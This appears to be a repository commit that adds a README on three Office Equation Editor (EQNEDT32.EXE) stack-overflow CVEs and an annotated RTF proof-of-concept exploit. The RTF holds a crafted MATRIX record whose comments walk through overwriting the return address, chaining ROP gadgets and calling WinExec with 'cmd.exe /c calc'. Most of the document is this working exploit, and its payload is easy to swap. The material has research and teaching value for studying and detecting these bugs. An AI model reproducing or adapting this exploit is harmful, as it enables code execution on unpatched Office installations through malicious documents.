Add files via upload

CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/README.md

@@ -0,0 +1,33 @@
+Given the fact that CVE-2017-11882/CVE-2018-0802/CVE-2018-0798 are stackoverflow in EQNEDT32.EXE so I just put them together.
+
+CVE-2017-11882:stackoverflow during font name parse 
+
+CVE-2018-0802:stackoverflow during font name parse 
+
+CVE-2018-0798:stackoverflow during matrix record parse
+
+25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08[4] exploit both CVE-2017-11882 and CVE-2018-0802;
+
+**cve-2018-0802 poc with aslr-bypass.rtf and cve-2018-0802 poc with comments.rtf exploit CVE-2018-0798.The so-called CVE-2018-0802 in the checkpoint article is actually CVE-2018-0798.Due to Microsoft's mistake,CVE-2018-0798 submitted by checkpoint[6] was classified into CVE-2018-0802,which caused extensive discussions among analysts at home and abroad.** 
+
+Microsoft add ASLR and fix serveral strcpy in 2017.11's patch but clearly not enough.So they remove this component in 2018.1's patch.
+
+reference:
+
+CVE-2017-11882
+
+1.[CVE-2017-11882漏洞分析、利用及动态检测](https://www.anquanke.com/post/id/87311)
+
+2.[Proof-of-Concept exploits for CVE-2017-11882](https://github.com/embedi/CVE-2017-11882)
+
+3.[Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did.(CVE-2017-11882)](https://0patch.blogspot.ca/2017/11/did-microsoft-just-manually-patch-their.html)
+
+CVE-2018-0802
+
+4.["黑凤梨"(BlackTech)最新APT攻击活动分析](http://www.freebuf.com/column/159865.html)
+
+CVE-2018-0798
+
+5.[手把手教你复现office公式编辑器内的第三个漏洞](https://www.anquanke.com/post/id/94841)
+
+6.[Many Formulas,One Calc–Exploiting a New Office Equation Vulnerability](https://research.checkpoint.com/another-office-equation-rce-vulnerability)

CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/cve-2018-0802 poc with comments.rtf

@@ -0,0 +1,72 @@
+{\rtf1
+    { Hello, calculator! }
+    {\object \objemb \objupdate \objw1 \objh1
+        {\*\objclass Equation.3}
+        {\*\objdata
+            01050000 {\*\comment OLE Version }
+            02000000 {\*\comment Format ID -> 0x02 = Embedded Object }
+            0b000000 {\*\comment ClassName.Length -> 0x0B = 11 }
+            4571756174696f6e2e3300 {\*\comment ClassName.String -> "Equation.3\x00" }
+            00000000 {\*\comment TopicName.Length -> 0x00 }
+            00000000 {\*\comment Item.Length -> 0x00 }
+            00140000 {\*\comment NativeData.Size -> 0x1400 = 5120 }
+
+            D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFF060000000700000008000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000304E4E74DF0AD30103000000C00900000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000FEFFFFFF160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F00000020000000210000002200000023000000240000002500000026000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF00000000000000007349000034060000040400000100090000030202000004001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A005A0421200000026060F001A00FFFFFFFF000010000000C0FFFFFFC0FFFFFF60420000600500000B00000026060F000C004D617468547970650000C00008000000FA0200000800000000000000040000002D010000050000001402F8016000050000001302F801404208000000FA0200001000000000000000040000002D010100050000001402C0034000050002004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002010300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000002C040000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000001500000057040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001302C00360421C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFFE2250A7A00000A0000000000040000002D0102000B000000320A4C05503C0800000031313131313131310C000000320A4C05D0340A000000313131313131313131310C000000320A4C05502D0A000000313131313131313131310C000000320A4C05D0250A000000313131313131313131310C000000320A4C05501E0A000000313131313131313131310C000000320A4C05D0160A000000313131313131313131310C000000320A4C05500F0A000000313131313131313131310C000000320A4C05D0070A000000313131313131313131310C000000320A4C0550000A000000313131313131313131310B000000320A8403503C0800000031313131313131310C000000320A8403D0340A000000313131313131313131310C000000320A8403502D0A000000313131313131313131310C000000320A8403D0250A000000313131313131313131310C000000320A8403501E0A000000313131313131313131310C000000320A8403D0160A000000313131313131313131310C000000320A8403500F0A000000313131313131313131310C000000320A8403D0070A000000313131313131313131310C000000320A840350000A000000313131313131313131310B000000320A6601503C0800000031313131313131310C000000320A6601D0340A000000313131313131313131310C000000320A6601502D0A000000313131313131313131310C000000320A6601D0250A000000313131313131313131310C000000320A6601501E0A000000313131313131313131310C000000320A6601D0160A000000313131313131313131310C000000320A6601500F0A000000313131313131313131310C000000320A6601D0070A000000313131313131313131310C000000320A660150000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFFD4EF1800040000002D01030004000000F00102000300000000000000000000000000000000000000000000000000
+
+            {\*\comment MTEF Header }
+            1C00 {\*\comment MTEF Header Size -> 0x1C = 28 }
+            00000200
+            A8C4
+            3B040000
+
+            00000000
+            E0A06600
+            ECE76500
+            00000000
+
+            03 {\*\comment Version }
+            01 {\*\comment Generating Platform }
+            01 {\*\comment Generating Product }
+            03 {\*\comment Product Version }
+            0A {\*\comment Product Subversion }
+
+            0A {\*\comment TYPESIZE Record }
+            01
+
+            05 {\*\comment MATRIX Record }
+            01
+            01
+            01
+            1C {\*\comment size1 -> Copy 8 bytes to EBP-0x14 }
+            94 {\*\comment size2 -> Copy 38 bytes to EBP-0x0C }
+
+            636D642E {\*\comment EBP-0x14 -> "cmd." }
+            65786520 {\*\comment EBP-0x10 -> "exe " }
+            2F632063 {\*\comment EBP-0x0C -> "/c c" }
+            616C6300 {\*\comment EBP-0x08 -> "alc\x00" }
+            00000000 {\*\comment EBP-0x04 }
+            19000000 {\*\comment EBP-0x00: 0x19 = (0x32 / 2) }
+            3AC74400 {\*\comment Return Address -> Base + 0x0004C73A } {\*\asmcomment add esp, 4; retn; }
+
+            285B4500 {\*\comment Writable Address -> Base + 0x00055B28 }
+            B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; }
+            B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; }
+            0000
+            4BED4000 {\*\comment Push EAX and Call WinExec -> Base + 0x0000ED4B }
+
+            00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+
+            {\*\comment End of the equation }
+
+            000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+
+            01050000 {\*\comment OLE Version }
+            05000000 {\*\comment Format ID -> 0x05 = Presentation Object with a ClassName }
+            0D000000 {\*\comment ClassName.Length -> 0x0D = 13 }
+            4D45544146494C455049435400734900 {\*\comment ClassName.String -> "METAFILEPICT\x00" }
+
+            {\*\comment Presentation Data }
+            00CCF9FFFF0C04000008007349340600000100090000030202000004001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A005A0421200000026060F001A00FFFFFFFF000010000000C0FFFFFFC0FFFFFF60420000600500000B00000026060F000C004D617468547970650000C00008000000FA0200000800000000000000040000002D010000050000001402F8016000050000001302F801404208000000FA0200001000000000000000040000002D010100050000001402C0034000050000001302C00360421C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF682C0A7800000A0000000000040000002D0102000B000000320A4C05503C0800000031313131313131310C000000320A4C05D0340A000000313131313131313131310C000000320A4C05502D0A000000313131313131313131310C000000320A4C05D0250A000000313131313131313131310C000000320A4C05501E0A000000313131313131313131310C000000320A4C05D0160A000000313131313131313131310C000000320A4C05500F0A000000313131313131313131310C000000320A4C05D0070A000000313131313131313131310C000000320A4C0550000A000000313131313131313131310B000000320A8403503C0800000031313131313131310C000000320A8403D0340A000000313131313131313131310C000000320A8403502D0A000000313131313131313131310C000000320A8403D0250A000000313131313131313131310C000000320A8403501E0A000000313131313131313131310C000000320A8403D0160A000000313131313131313131310C000000320A8403500F0A000000313131313131313131310C000000320A8403D0070A000000313131313131313131310C000000320A840350000A000000313131313131313131310B000000320A6601503C0800000031313131313131310C000000320A6601D0340A000000313131313131313131310C000000320A6601502D0A000000313131313131313131310C000000320A6601D0250A000000313131313131313131310C000000320A6601501E0A000000313131313131313131310C000000320A6601D0160A000000313131313131313131310C000000320A6601500F0A000000313131313131313131310C000000320A6601D0070A000000313131313131313131310C000000320A660150000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFFD4EF1800040000002D01030004000000F0010200030000000000
+        }
+    }
+}